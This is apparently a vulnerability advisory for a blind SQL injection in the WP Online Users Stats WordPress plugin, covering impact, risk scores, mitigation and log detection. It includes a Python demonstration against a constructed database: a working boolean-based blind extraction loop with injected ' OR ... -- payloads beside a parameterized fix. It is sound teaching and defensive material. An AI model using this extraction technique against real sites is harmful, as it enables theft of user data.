Impact
This vulnerability is an instance of improper neutralization of special elements used in an SQL command (CWE-89), allowing an attacker to perform blind SQL injection against the WordPress WP Online Users Stats plugin. Because the injection is blind, the application does not return query results or database errors to the attacker; instead the attacker infers database contents from differences in the response, typically a true/false condition or a time delay, one bit per request. The flaw can enable the attacker to read, modify, or delete database records, including sensitive user data such as account records in the WordPress users table, compromising confidentiality and integrity and potentially providing a foothold for further exploitation. The CVE description does not mention remote code execution; any escalation beyond database access is unconfirmed and would depend on the privileges of the database account and the site's configuration.
Affected Systems
The WP Online Users Stats plugin by HK is affected in all released versions through 1.0.0. Anyone still running version 1.0.0 or earlier should treat every WordPress installation with the plugin installed as vulnerable, regardless of the WordPress core version. If no patched release is available, deactivating and removing the plugin is the only reliable mitigation, since a deactivated plugin's files may remain reachable over HTTP.
Risk and Exploitability
With a CVSS score of 9.3, the risk is classified as critical. The EPSS score below 1% indicates that the probability of exploitation in the wild is currently low, and the vulnerability is not yet listed in the CISA Known Exploited Vulnerabilities catalog; note that a low EPSS reflects currently observed activity, not the difficulty of exploitation. Based on the description, the attack vector is inferred to be web-based: the attacker submits crafted input through the plugin's HTTP-facing functionality, and that input reaches a database query without being parameterized or escaped. Because the injection is blind, exploitation is normally automated with boolean-based or time-based inference over many requests, so a burst of near-identical requests to the plugin's endpoints carrying SQL syntax in a parameter is the pattern to look for in web server logs. Successful exploitation would allow the attacker to exfiltrate data or modify site content, and could form a foothold for further attacks.
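The following is an added illustration of the two points made above (the CWE-89 pattern in the Impact section, and the blind, inference-driven exploitation described here). It is not the plugin's code and does not reproduce the actual vulnerable query; the schema, table names, rows and the `ip` parameter are constructed for the demonstration. An in-memory SQLite database stands in for MySQL, and `count_hits_vulnerable` concatenates request data into SQL text the way a CWE-89 bug does, while `count_hits_fixed` binds it as a parameter (the WordPress equivalent is `$wpdb->prepare()`). `extract_string` shows why "blind" is not "harmless": using only the yes/no answer of whether any row matched, it recovers a value from an unrelated table one character at a time.

```python
import sqlite3

# Constructed in-memory schema standing in for the WordPress tables a stats
# plugin would touch. It is not the real plugin's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, "
                 "user_login TEXT, user_email TEXT)")
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', 'admin@example.org')")
    conn.execute("CREATE TABLE online_stats (ID INTEGER PRIMARY KEY, "
                 "ip TEXT, hits INTEGER)")
    conn.executemany("INSERT INTO online_stats (ip, hits) VALUES (?, ?)",
                     [("203.0.113.5", 3), ("198.51.100.7", 9)])
    return conn

def count_hits_vulnerable(conn, ip):
    """CWE-89 pattern (hypothetical): request data is spliced into the SQL text."""
    sql = "SELECT COUNT(*) FROM online_stats WHERE ip = '" + ip + "'"
    return conn.execute(sql).fetchone()[0]

def count_hits_fixed(conn, ip):
    """Hardened form: the value travels as a bound parameter, never as SQL.
    In a WordPress plugin this corresponds to $wpdb->prepare('... WHERE ip = %s', $ip)."""
    sql = "SELECT COUNT(*) FROM online_stats WHERE ip = ?"
    return conn.execute(sql, (ip,)).fetchone()[0]

def oracle(conn, query_fn, condition):
    """Boolean oracle: the endpoint reveals only whether any row matched,
    so each request yields one bit. No query output or error is echoed."""
    payload = "' OR (" + condition + ") -- "
    return query_fn(conn, payload) > 0

def extract_string(conn, query_fn, subquery, max_len=32):
    """Boolean-based blind extraction of a scalar subquery result, one
    character per position, binary-searching the ASCII code point."""
    result = ""
    for pos in range(1, max_len + 1):
        # Stop once the target string has no character at this position.
        if not oracle(conn, query_fn, f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"
            if oracle(conn, query_fn, cond):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result

# Subquery against a table the stats endpoint was never meant to expose.
TARGET = "SELECT user_email FROM wp_users WHERE ID = 1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable endpoint leaks:", extract_string(db, count_hits_vulnerable, TARGET))
    print("fixed endpoint leaks:     ", repr(extract_string(db, count_hits_fixed, TARGET)))
```

Against the concatenating function the loop recovers the full e-mail address in roughly eight requests per character; against the parameterized function the payload is compared literally to the `ip` column, matches nothing, and the extraction stops at the first probe. The same request volume is what a detection rule should key on: many near-identical requests to one endpoint whose parameter values contain quotes, `OR`, `substr` or `sleep`-style functions.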
OpenCVE Enrichment